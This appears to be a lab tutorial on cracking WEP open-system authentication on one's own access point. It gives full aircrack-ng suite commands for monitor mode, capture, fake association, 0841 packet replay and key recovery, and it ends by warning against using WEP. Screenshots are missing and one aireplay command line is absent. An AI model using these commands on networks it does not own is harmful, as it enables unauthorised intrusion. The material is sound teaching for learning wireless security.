Similar to the previous lesson in which we obtained the Shared Key eventually through decrypting the key over the air, we didn’t even have to authenticate with the access point in order obtain the key. We don’t need to provide credentials to the access point during authentication, any client can actually connect, WEP open system authentication however encrypts the data frames so in order to read this data we will require the correct key.
Open Authentication unlike the name suggests is actually advisable to use over shared key authentication. Both of these authentication mechanisms are weak as I am sure you understand by now and have been replaced by WPA/WPA2 for securing your network using a Shared Key similar to what would have been used with WEP SKA.
Let’s get to it!:
Configure your access point to the following settings
You definitely can set your card into monitor mode now and you know that you need to do that first so do it with:
airmon-ng start wlan0 6
The “6” at the end will run the card on channel 6 for youNext Start airodump-ng with:
airodump-ng –bssid 00:18:E7:XX:XX:XX –channel 6 -w testcapture mon0
“–bssid” is for your AP_MAC
“–channel 6” is for setting channel 6
“-w testcapture” will write to a file called testcapture
“mon0” is your wireless card interfaceAirodump-ng output will look like the following:Note that like the Shared Key Authentication the AUTH in this case is “OPN” for Open System Authentication.
Associate with the access point
aireplay-ng -1 0 -e test -a 00:18:E7:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0Success associating looks like the following:Starting the 0841 interactive packet replay attack“-2” is for interactive frame selection and starting the interactive packet replay
“-p 0841” sets the Frame Control Field so that the packet looks like it is coming from a wireless client
“-c FF:FF:FF:FF:FF:FF” sets the destination MAC as broadcast. Required to cause the AP to replay the packet and thus gets a new IV
“-b” is the AP MAC address
“-h” is the MAC of YOUR Card
You will need to select a packet, feel free to select “no” until you get something slightly bigger than a size of 86 if you want, I personally find you have better success if you do this.
Looking at the bottom left once you have selected a packet you will then see injection start and your packets per second should rise also as you can see I have 499 pps below.
Check your airodump output and you should see your frames and data have risen greatly so check your capture directory and then run aircrack-ngStart aircrack-ng with:
aircrack-ng -b 00:18:E7:XX:XX:XX testcapture*.cap
“-b” to select your AP_MAC
“testcapture*.cap” will run aircrack-ng against all your capture files in the directory with the name testcapture-X.capAfter a short period of time success looks like this:
WEP Open system authentication is no better at protecting your privacy than WEP shared key authentication and with a few minutes and patience can be easily compromised and give an attacker access to your internal resources. Don’t rely on WEP at all, do not use it, it is not secure at all and trivial to crack.